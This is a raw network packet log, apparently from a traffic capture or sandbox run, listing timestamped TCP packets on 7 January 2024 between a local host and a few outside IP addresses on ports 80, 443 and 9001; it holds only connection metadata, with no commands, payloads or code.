                                                                                                                                                                    Jan 7, 2024 05:29:55.151391029 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.151470900 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.151515007 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.153222084 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.153295040 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.153363943 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.198492050 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.198709011 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.198759079 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.289707899 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.289774895 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.289853096 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.291059971 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.291193962 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.291249037 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.294337988 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.294413090 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.295598030 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.296852112 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.296933889 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.299155951 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.299679995 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.299905062 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.299954891 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.300141096 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.300156116 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.300168991 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.300203085 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.300204039 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.300247908 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.300643921 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.300740004 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.300879002 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.307147980 CET44349756172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.307235003 CET49756443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:55.308516979 CET49756443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:55.308528900 CET44349756172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.308897972 CET44349756172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.310384035 CET49756443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:55.310525894 CET49756443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:55.310595989 CET44349756172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.345156908 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.345206022 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.345263958 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.345319033 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.345367908 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.345403910 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.345417976 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.345510006 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.345557928 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.346927881 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.388155937 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.395474911 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.395756006 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.395844936 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.483928919 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.484020948 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.484111071 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.486165047 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.486258030 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.486876011 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.490436077 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.490788937 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.490833998 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.490931034 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.491231918 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.491281986 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.493155956 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.493249893 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.493314028 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.494021893 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.494106054 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.494318008 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.494360924 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.494404078 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.494442940 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.494527102 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.494601011 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.494752884 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.494762897 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.494831085 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.494879007 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.540451050 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.540479898 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.540528059 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.540553093 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.540565968 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.540580034 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.540610075 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.540627956 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.540666103 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.583946943 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.591944933 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.592008114 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.592031002 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.637958050 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.679889917 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.679913044 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.679976940 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.682449102 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.682495117 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.682547092 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.685805082 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.685843945 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.685895920 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.686295033 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.686310053 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.686358929 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.688555002 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.688867092 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.688920021 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.689512014 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.689589024 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.689626932 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.689690113 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.689711094 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.689759016 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.689913034 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.690042019 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.690088034 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.690212965 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.690310955 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.690781116 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.709476948 CET44349756172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.709623098 CET44349756172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.709683895 CET49756443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:55.709816933 CET49756443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:55.709836960 CET44349756172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.723350048 CET49758443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:55.723387957 CET44349758172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.723598003 CET49758443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:55.723972082 CET49758443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:55.723988056 CET44349758172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.734787941 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.734816074 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.734829903 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.734875917 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.734929085 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.734960079 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.734973907 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.735027075 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.735042095 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.735100985 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.786238909 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.786288977 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.786346912 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.832948923 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.876003027 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.876036882 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.876125097 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.879143000 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.879194975 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.879268885 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.882201910 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.882339001 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.882407904 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.883227110 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.883265972 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.883275032 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.885160923 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.885268927 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.885322094 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.885971069 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.886017084 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.886054039 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.887362957 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.887418985 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.887502909 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.887545109 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.887619972 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.887649059 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.887768984 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.887850046 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.887866020 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.918824911 CET44349758172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.918956995 CET49758443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:55.919260025 CET497559001192.168.2.488.198.112.25
                                                                                                                                                                    Jan 7, 2024 05:29:55.920334101 CET49758443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:55.920346022 CET44349758172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.920615911 CET44349758172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.921876907 CET49758443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:55.921993017 CET49758443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:55.922000885 CET44349758172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.930071115 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.930104971 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.930119991 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.930138111 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.930145979 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.930154085 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.930167913 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.930200100 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.930202007 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.930231094 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.930254936 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.930299997 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:55.981865883 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.981954098 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:55.982048035 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.069962025 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.070122957 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.070235014 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.072930098 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.073019028 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.073074102 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.073088884 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.073149920 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.075493097 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.076503038 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.076592922 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.079147100 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.079211950 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.079238892 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.079282999 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.079343081 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.079412937 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.081769943 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.081825972 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.081834078 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.081849098 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.081861973 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.081875086 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.081880093 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.081913948 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.081914902 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.081928968 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.081952095 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.122319937 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.124067068 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.124191999 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.124249935 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.124305964 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.124382973 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.124497890 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.124547958 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.124561071 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.124604940 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.124691010 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.124771118 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.125747919 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.175848007 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.175896883 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.175937891 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.264945984 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.265019894 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.265073061 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.267852068 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.267888069 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.267940998 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.270062923 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.270077944 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.270123005 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.273626089 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.273643970 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.273677111 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.273684978 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.273714066 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.273760080 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.276207924 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.276282072 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.276297092 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.276325941 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.276329041 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.276364088 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.276375055 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.276396990 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.276434898 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.276434898 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.276460886 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.276506901 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.316725969 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.316740990 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.316831112 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.318535089 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.318586111 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.318633080 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.318679094 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.318696022 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.318733931 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.318759918 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.318775892 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.318818092 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.320183992 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.320307016 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.320353031 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.353379011 CET44349758172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.353502035 CET44349758172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.353549957 CET49758443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:56.353662014 CET49758443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:56.353682995 CET44349758172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.370204926 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.370297909 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.370368958 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:56.391846895 CET49759443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:56.391921997 CET44349759172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.392013073 CET49759443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:56.392487049 CET49759443192.168.2.4172.67.131.114
                                                                                                                                                                    Jan 7, 2024 05:29:56.392509937 CET44349759172.67.131.114192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.459146023 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:56.459228992 CET804973591.215.85.120192.168.2.4
